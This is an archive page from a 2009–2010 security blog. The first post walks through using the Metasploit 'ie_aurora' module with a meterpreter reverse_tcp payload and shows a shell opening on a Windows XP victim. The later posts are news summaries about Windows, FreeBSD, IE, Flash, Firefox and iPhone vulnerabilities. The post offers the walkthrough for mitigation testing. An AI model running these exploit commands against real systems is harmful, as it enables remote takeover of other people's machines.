Tag Archives: exploit

Reproducing the “Aurora” IE Exploit

Posted by peter on January 15, 2010 – 9:37 pm
Filed under Articles
Tagged as , , , ,
Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Long-time Windows vulnerability might be fixed soon

Posted by peter on January 1, 2010 – 2:01 am
Filed under Security News
Tagged as , , , , , , , ,
Mark Russinovich, a software engineer hired by Microsoft to improve the stability of its Windows OS, may have found the key to preventing a significant majority of Windows exploits.

Experts say that, for years, one of Windows' primary vulnerabilities has been its tendency to try and "run" data as though it were computer code. This can be exploited fairly simply by inserting malicious code into heap memory and intentionally crashing the process - placing the system into a state where it looks to the malware itself for instructions, leading to identity theft or other bad results.

Russinovich, according to Beta News, says that one of the first steps to making Windows more secure is to make it more stable. In this way, he says, crash detection programs have more system resources to spend on analyzing the underlying cause of crashes and can more effectively monitor systems for unauthorized processes.

The Inquirer reports that Russinovich has designed a "fault-tolerant heap," which could provide additional help in preventing the type of exploits that have plagued previous versions of Windows.

FreeBSD hit with local root vulnerability, patch rushed into service

Posted by peter on December 3, 2009 – 1:09 am
Filed under Security News
Tagged as , , , , , , , , , , , ,
The makers of open-source operating system FreeBSD released a hurried patch to correct what has been described as a critical security flaw affecting its local root system. The flaw could allow malicious code to be executed with full administrative rights on affected systems.

An exploit for the flaw, published on the Full Disclosure computer security mailing list, was created by a Full Disclosure user known by the online handle Kingcope. Kingcope writes that the "bug resides in the Run-Time Link Editor (rtld)" whose security provisions can be circumvented relatively simply.

Colin Percival, FreeBSD's security officer, recently announced the availability of an emergency patch, which fixes the vulnerability. Percival did warn, however, that due to the immediate need for a patch, the project was conducted with an eye to speed rather than accuracy, and emphasizes that downloading and using the patch is at the user's own risk.

The exploit is one of the first in recent memory published for an open-source OS; most recent published exploits have targeted Microsoft or Google products.

New zero-day flaw discovered in older versions of Internet Explorer

Posted by peter on November 24, 2009 – 2:39 am
Filed under Security News
Tagged as , , , , , , ,
Security researchers at Symantec report that new malware has targeted a memory corruption vulnerability in Internet Explorer 6 and 7, which carries the potential for system crashes or malicious redirects.

The company revealed the vulnerability in a blog post over the weekend, saying that, while the current iteration of the malware showed "signs of poor reliability," they expect well-written exploit code to hit the internet in "the near future." The Javascript-based exploit - which the researchers have dubbed Bloodhound.Exploit.129 - requires prospective victims to visit an infected website.

As usual, the best way to avoid being infected by this malware is to ensure that all of the latest security patches and updates have been applied. Symantec recommends disabling Javascript and only visiting trusted websites until Microsoft can release a bugfix for the vulnerability.

Though long since superseded by Internet Explorer 8, Internet Explorer 6 and 7 are still widely used by some enterprise consumers for reasons of compatibility and familiarity. Experts recommend upgrading to the latest version and keeping all software patched.

Windows 7 zero-day exploit story keeps getting grimmer

Posted by peter on November 17, 2009 – 11:56 pm
Filed under Security News
Tagged as , , , , , , , , ,
A new security advisory issued by Microsoft confirms independent findings about a critical security vulnerability in Windows 7, and offers advice to users who might be affected by the exploit.

The flaw is one of several that have been discovered in Microsoft's Server Message Block architecture, and well-designed exploit code could allow hackers to remotely crash affected computers via denial-of-service attacks.

Microsoft advised users of affected machines to block TCP ports 139 and 445 at the firewall, and cut off the SMB system's access to the internet until a patch can be produced and distributed. Windows 7 and Windows Server 2008 R2 are said to be vulnerable to the exploit, which could potentially be spread via malicious web pages and Microsoft Office documents.

However, the company strongly criticized the security researcher who publicized the exploit, calling the public disclosure of an important security flaw "irresponsible" and urging users to report vulnerabilities directly to the company in the future. Laurent Gaffie told ZDNet that he publicized the information due to what he characterized as a lackadaisical Microsoft response to an unrelated security flaw, which is also unpatched.

Windows 7 RC has zero-day security flaw

Posted by peter on September 9, 2009 – 7:43 pm
Filed under Security News
Tagged as , , , , , , ,
The release candidate version of the Windows 7 operating system has a zero-day security vulnerability that could allow an attacker to hijack PCs, Microsoft acknowledged late Tuesday.

Security researchers had disclosed security flaws in both Windows 7 RC and Windows Server 2008 R2 on Monday, the day before Microsoft issued its monthly batch of security patches. The vulnerability exists in the Server Message Block 2 (SMB), a network file- and print-sharing protocol that ships with Windows.

"An attacker who successfully exploited this vulnerability could take complete control of an affected system," Microsoft said in a security advisory. "Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart."

Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability, but the release to manufacturing versions - the final software versions shipped with new PCs - are not affected, Microsoft said.

Microsoft once again said the vulnerability was not disclosed "responsibly," because researchers posted the vulnerability to the web without warning the company ahead of time.

A critical vulnerability in Internet Information Services (IIS), affecting Windows Server 2003 and 2008, was disclosed in a similar fashion last week.

Security flaw in Adobe Flash exploited by Trojan malware

Posted by peter on July 23, 2009 – 11:09 pm
Filed under Security News
Tagged as , , , , , ,
Security researchers at Symantec have identified a critical vulnerability in Adobe Flash that allows an attacker to infect PCs with Trojan malware upon opening a malicious Adobe Acrobat PDF file. Adobe acknowledged the flaw and said it is working on releasing a fix by July 30.

The Flash vulnerability affects current versions of Flash Player for Windows, Mac and Linux operating systems and the authplay.dll component that ships with Adobe Reader and Acrobat v9.x for Windows, Macintosh and UNIX, Adobe's security response team said on its blog.

Deleting, renaming or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a crash or error message when opening a PDF that contains SWF content, Adobe said.

Symantec warned Wednesday that the Flash bug is serious because of the widespread use of Flash across operating systems and products.

Whereas most vulnerabilities only affect one web browser or software product, Flash exists in all popular browsers and is also available in PDF documents.

"[T]herefore, the threat posed by this issue is not to be taken lightly," Symantec warned on its blog.

Mozilla: No hacker exploit for Firefox 3.5.1 vulnerability

Posted by peter on July 20, 2009 – 9:54 pm
Filed under Security News
Tagged as , , , , , , ,
A flaw in the just-released Firefox 3.5.1 web browser has been confirmed by Mozilla, but the company said on its security blog that it has seen no proof of an attack exploit for the vulnerability, which causes the browser to crash.

IBM reported last week that Firefox 3.5.x is vulnerable to a stack-based buffer overflow, by which an attacker could execute arbitrary code on the system or cause the application to crash. IBM rated the security threat from the vulnerability as high, because a remote hacker could gain access.

Mozilla said that, while the vulnerability exists and can result in crashes of some versions of Firefox, "the reports by press and various security agencies have incorrectly indicated that this is an exploitable bug." The company said it has seen no example of exploitability.

The Department of Homeland Security's National Vulnerability Database reports that the flaw allows remote attackers to cause a denial of service (application crash), "or possibly have unspecified other impact," via a long Unicode string.

Mozilla said it has attempted to get IBM and others to correct their reports.

Firefox 3.5.1 was issued last week, ahead of schedule, in order to patch a security flaw in the earlier version of the browser, Firefox 3.5.

iPhone may be vulnerable to SMS security flaw

Posted by peter on July 6, 2009 – 9:02 pm
Filed under Security News
Tagged as , , , , , ,
Apple's iPhone 3GS may have a SMS flaw that could allow an attacker to remotely execute malicious code or hijack the device as part of a botnet, security researcher Charlie Miller said last week at a network security conference in Singapore, according to IDG News Service.

Miller, an authority on Mac OS X security and co-author of The Mac Hacker's Handbook, said he was able to use the vulnerability in the way the iPhone receives text messages to remotely crash the phone. Miller said he reported the vulnerability to Apple.

He said hackers could theoretically exploit the vulnerability to monitor the location of the phone using GPS, turn on the phone's microphone to eavesdrop on conversations or hijack the phone as part of a botnet or to launch distributed denial-of-service attacks, IDG News reported.

Miller also warned that "jailbreaking" an iPhone to add software or capabilities not offered by Apple leaves the device vulnerable to hacking and viruses.

"If you care about security, don't use a jailbroken iPhone," Miller said, according to IDG News.